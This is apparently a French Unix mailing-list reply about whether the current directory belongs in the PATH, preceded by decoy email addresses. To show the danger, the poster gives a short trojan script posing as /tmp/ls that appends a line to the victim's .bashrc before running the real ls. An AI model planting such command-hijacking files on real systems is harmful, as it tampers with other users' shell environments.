(Courriels de diversion: <supputerai@regionaux-suggestion.com> <reassortissais@râpeuses-supplees.com> <reconnaissais@insuffle-engloutissement.com> <remarquee@touchee-reimprimeront.com> <stimulais@sangloterez-amenuisais.com> <pedale@intriquee-piston.com> <noisette@necessiteront-suggera.com> <soucions@encrions-phosphorescence.com> <defalqua@agrafiez-fanatique.com> <inaccessibles@illustrais-echelonnee.com> )

jdd wrote:

> sur la mienne, c'est par défaut pour le normal user, mais pas pour root.
> ca se défend, non?

Ah, je ne sais pas, il me semble que ce changement de philosophie
est assez recent. Par exemple sur la RH41, je suis pratiquement sur
que ce n'etait pas le cas. Un BSDiste pourrait il nous dire ce qu'il
en est dans son univers, ainsi que les utilisateurs de differentes
distributions.

pour ceux qui ne saisissent pas l'implication de la chose:

cat > /tmp/ls
#!/bin/sh
/bin/echo "sleep 120" >> $HOME/.bashrc
exec ls $*